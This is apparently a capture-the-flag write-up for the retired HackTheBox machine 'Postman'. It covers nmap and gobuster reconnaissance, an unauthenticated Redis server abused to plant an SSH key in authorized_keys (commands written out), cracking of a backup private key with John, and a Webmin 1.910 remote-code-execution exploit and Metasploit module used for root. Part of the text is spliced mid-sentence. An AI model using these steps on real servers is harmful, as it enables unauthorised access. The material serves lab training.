Postman is an “easy” rated and retired machine from HackTheBox, meaning you will need a VIP subscription to interact with this machine. Although rated as easy, it will still a great box to get some experience with services and tools we don’t use often.
We start with nmap, inducing the “-p-” switch to scan all ports.
sudo nmap -sV -sC -p- postman
We have SSH, Apache webserver, Redis and port 1000 running an HTTP server with an app called Webmin.
I always like to visit the web-server first and get GoBuster working. SSH is rarely the initial vector in CTF’s, but something to always come back to if and when you get some credentials.
After a poke around on the website there doesn’t seem to be too much going on.
Start GoBuster on port 80;
gobuster dir -u http://postman -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
As we let that run, lets check out Redis. I grab the latest set of tools so we can interact with the Redis server. This includes the command line interface which will allow us to login and interact with the Redis server.
sudo apt-get install redis-tools
It seems like we can connect to the Redis server without authentication.
Now that we
am on the box, we need to escalate privileges. A bit of research I come across this article.
The general gist of the priv esc is to upload our own SSH key to the server, through Redis, by changing the Redis backup location. We can then SSH into the box.
First things first, we need to create our SSH pair. After that, we take the contents of the public key and echo that into a text file, padding it with two line breaks. I named my SSH key “pair” and the text file pair.txt.
(echo -e "\n\n"; cat pair.pub; echo -e "\n\n") > pair.txt
Now we take the output of cat’ing the text file, and use that as input in our command to upload it to the Redis server.
cat pair.txt | redis-cli -h 10.10.10.160 -x set pwnedWe then head onto our redis server. We can confirm our key has been successfully uploaded by using the command;
get pwned
Next we need to find out the installation location of Redis. We can do this with;
config get dirOur location is /var/lib/redis.
We now set the backup location to the .ssh folder.
config set dir /var/lib/redis/.sshWe then backup the data from our txt file, which is sitting in memory, into the backup location, which we have set as the SSH folder.
config set dbfilename authorized_keys
Log in and we are now on the box.
Now that we are on the server, drag across linpeas and run;
We find a file called id_rsa.bak;
Make a copy of that file as we want to crack it.
We need to convert it to a format that John can use, using the tool ssh2john;
We start cracking using the Rockyou wordlist and get a password straight away, recovering the password “computer2008”;
I try to switch to root user however I get authentication failure.
What users might be on the box?
cat /etc/passwd |grep /bin/bash
So we switch user to Matt. We should be able to get a flag now.
Recall our Webmin instance? Let’s try to log into that with Matt’s credentials.
There are lots of exploits available for this vulnerable version of Webmin, which is 1.910 according to nmap. Most are for Metasploit, which I am trying to avoid.
I came across this one, written in python 3;
https://github.com/NaveenNguyen/Webmin-1.910-Package-Updates-RCE/blob/master/exploit_poc.py
I setup a listener
And run the exploit
And we get back our shell, run “id”;
We are root, now we just need to get the flag. The shell is very basic so we need to get the flag in a single command. First find out where we are.
ls the root directory
And then cat the txt file.
Metasploit
For fun let’s try the box with Metasploit.
Boot it up and search for an exploit.
Lets use 3 and set the options
And thats Postman.
